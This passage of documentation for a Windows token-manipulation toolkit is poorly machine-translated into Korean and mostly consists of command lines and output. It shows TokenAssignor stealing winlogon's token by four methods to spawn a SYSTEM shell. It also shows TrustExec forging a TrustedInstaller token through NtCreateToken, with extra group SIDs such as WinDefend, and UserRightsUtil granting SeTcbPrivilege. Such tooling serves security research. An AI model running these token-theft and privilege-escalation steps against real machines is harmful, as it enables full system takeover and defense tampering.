SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEMSDTC EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_515780 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEMSDTC GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000070
Value[0x01] : 0x000000000007DF18
[*] Done.
스레드에 적용되는 가장 한 토큰을 조사하려면 스레드 ID를 다음과 같이 -t 옵션으로 설정하십시오.
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
C:Dev>.TokenDump.exe -s -p 3516 -t 4656 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for svchost.exe (PID: 3516, TID: 4656)]
Token User : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITYSYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x0000000000038CC4
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x000000000002CE61
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : IsFiltered, NotLow, EnforceRedirectionTrust
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeDebugPrivilege EnabledByDefault, Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEDiagTrack EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_180260 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
==================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEDiagTrack GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000047
Value[0x01] : 0x000000000002C0FA
[*] Done.
위로 돌아갑니다
프로젝트
이 도구는 기본 토큰을 할당하는 방법을 Learh하는 것입니다.
PS C:Dev> .TokenAssignor.exe
TokenAssignor - Tool to execute token assigned process.
Usage: TokenAssignor.exe [Options]
-h, --help : Displays this help message.
-c, --command : Specifies a command to execute. Default is cmd.exe.
-m, --method : Specifies a method ID (0 - 3).
-p, --pid : Specifies a source PID for token stealing.
[!] -m option is required.
이 도구는 지정된 프로세스에서 토큰을 훔치고 할당 된 프로세스를 실행하려고합니다. 대부분의 방법에는 관리 권한이 필요합니다. CreateProcessAsUser API를 사용하여 할당 된 프로세스를 실행하려면 -m 옵션을 0 으로 설정하십시오.
PS C:Dev> Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
270 13 2452 10108 0.33 688 1 winlogon
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 0
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x68).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).
[+] Impersonation as winlogon.exe is successful.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 9552).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
-m 옵션을 1 으로 설정하면이 도구는 일시 중단 프로세스를 만들고 기본 토큰을 도난당한 토큰으로 업데이트하려고합니다. 이 방법은 커널 제한으로 인해 세션 ID를 변경하는 데 사용할 수 없습니다. 커널은 토큰의 세션 ID가 _EPROCESS 의 세션 ID와 일치하도록 강요합니다.
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 1
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C8).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).
[+] Impersonation as winlogon.exe is successful.
[+] Suspended "C:Windowssystem32cmd.exe" is executed successfully (PID = 9968).
[*] Current user of the suspended process is DESKTOP-5OHMOBJuser (SID: S-1-5-21-1955100404-698441589-1496171011-1001)
[+] Primary token for the suspended process is updated successfully.
[*] Current user of the suspended process is NT AUTHORITYSYSTEM (SID: S-1-5-18)
[*] Resuming the suspended process.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
SET -m 옵션이 2 로 설정되면 보조 로그온 서비스를 사용하여 새 토큰 할당 프로세스를 만듭니다.
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 2
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C4).
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 5832).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
SET -m 옵션이 3 으로 설정되면 PPID 스푸핑 방법으로 새 토큰 할당 프로세스를 만듭니다.
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobjuser S-1-5-21-1955100404-698441589-1496171011-1001
PS C:Dev> .TokenAssignor.exe -p 688 -m 3
[+] SeDebugPrivilege is enabled successfully.
[+] Got a handle from PID 688 (Handle = 0x2C4).
[+] Thread attribute is built successfully.
[+] "C:Windowssystem32cmd.exe" is executed successfully (PID = 4852).
[*] User of the created process is NT AUTHORITYSYSTEM (SID: S-1-5-18).
PS C:Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
위로 돌아갑니다
프로젝트
이 도구는 프로세스를 NT SERVICETrustedInstaller Group 계정으로 실행하는 것입니다. 원래 POC는 Grzegorz Tworek의 TrustedInstallercmd2.c입니다. 나는 그것을 c#에 포팅하고 도구로 재건했다. 대부분의 운영에는 관리 특권이 필요합니다 ( SeDebugPrivilege , SeImpersonatePrivilege 및 높은 필수 수준) :
PS C:Dev> .TrustExec.exe
TrustExec - Tool to create TrustedInstaller process.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account name or SID.
-n, --new-console : Flag to create new console. Use with -x flag.
-x, --exec : Flag to execute command.
-a, --account : Specifies account name to lookup.
-c, --command : Specifies command to execute. Default is cmd.exe.
-e, --extra : Specifies command to execute. Default is cmd.exe.
-m, --method : Specifies method ID. Default is 0 (NtCreateToken method).
-s, --sid : Specifies SID to lookup.
Available Method IDs:
+ 0 - Leverages NtCreateToken syscall.
+ 1 - Leverages virtual logon.
+ 2 - Leverages service logon.
+ 3 - Leverages S4U logon.
+ 4 - Leverages TrustedInstaller service.
이 모듈의 경우 2 개의 기술이 구현됩니다. -m 옵션을 사용하여 메소드를 명세 할 수 있습니다. -m 옵션의 값은 0 에서 4 까지의 정수 일 수 있습니다. 예를 들어 -m 옵션을 0 으로 설정하면이 도구는 NtCreateToken 을 사용하여 TrustedInstaller 토큰을 얻으려고합니다.
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0xE8).
[+] Got a token assigned process (PID: 2832).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authoritysystem S-1-5-18
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:Dev> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
새 콘솔로 프로세스를 만들려면 다음과 같이 -n 플래그를 설정하십시오.
PS C:Dev> .TrustExec.exe -m 1 -x -c powershell -n
[*] Virtual logon method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] SeTcbPrivilege is enabled successfully for current thread.
[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).
[+] A virtual account VirtualDomainVirtualAdmin is created successfully (SID: S-1-5-110-500).
[+] Got a virtual logon token (Handle = 0xEC).
[+] Got a token assigned process (PID: 23836).
[+] VirtualDomain domain is removed successfully.
TrustedInstaller 서비스 방법 ( -m 옵션은 4 ) 이외의 각 방법은 -e 옵션을 가진 추가 그룹 SID를 허용합니다. -e 옵션의 값 형식은 sddl sid string이어야합니다. SID 문자열 분리기의 경우 다음과 같이 쉼표를 사용할 수 있습니다.
PS C:Dev> .TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0x30C).
[+] Got a token assigned process (PID: 17500).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:Dev> whoami /user
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYSERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTINBackup Operators Alias S-1-5-32-551 Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICETrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
NT SERVICEWinDefend Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Enabled by default, Enabled group
계정 SID를 해결하려면 다음과 같이 계정 이름이있는 -l 플래그 및 -a 옵션을 설정합니다.
PS C:Dev> .TrustExec.exe -l -a "nt servicewindefend"
[*] Account Name : NT SERVICEWinDefend
[*] Account SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
PS C:Dev> .TrustExec.exe -l -a users
[*] Account Name : BUILTINUsers
[*] Account SID : S-1-5-32-545
[*] Account Type : Alias
위로 돌아갑니다
프로젝트
이 도구는 secpol.msc 없이 사용자를 바로 관리하는 것입니다. lookup 이외의 명령에는 관리자 권한이 필요합니다.
C:dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
특정 계정에 대한 사용자 권한을 열거하려면 -u 와 함께 enum 명령을 사용하십시오. 디 다음과 같이 opitons 또는 -s 옵션 :
C:dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSOjeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
-d 옵션이있는 도메인 이름을 지정하지 않으면 로컬 컴퓨터 이름을 도메인 이름으로 사용하십시오.
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
이 명령은 특정 권한을 가진 사용자를 찾는 것입니다. 예를 들어, 사용자를 찾으려면 SeDebugPrivilege 가있는 경우 다음과 같이 실행하십시오.
C:dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTINAdministrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
-r 옵션에 사용 가능한 값을 나열하려면 -l 옵션을 사용하십시오.
C:dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
이 명령은 다음과 같이 계정 SID를 조회하는 것입니다.
C:dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSOdavid
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSODomain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
-d 옵션이있는 도메인 이름을 지정하지 않으면 로컬 컴퓨터 이름을 도메인 이름으로 사용하십시오.
C:dev>hostname
CL01
C:dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
이 명령은 특정 사용자 계정에 대한 사용자 권한을 부여하거나 취소하는 것입니다. 사용자 오른쪽을 허가하려면 사용자를 -g 옵션 값으로 지정하십시오.
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
사용자 오른쪽을 취소하려면 사용자를 -r 옵션 값으로 지정하십시오.
C:dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSOAdministrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSOAdministrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:de>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
-g 또는 -r 옵션에 사용 가능한 값을 나열하려면 -l 옵션을 사용하십시오.
C:dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
위로 돌아갑니다
위로 돌아갑니다
WINDBG 확장 프로그램에 대한 조언에 감사드립니다.
주목할만한 연구에 감사드립니다.
샘플 커널 드라이버 릴리스에 감사드립니다.
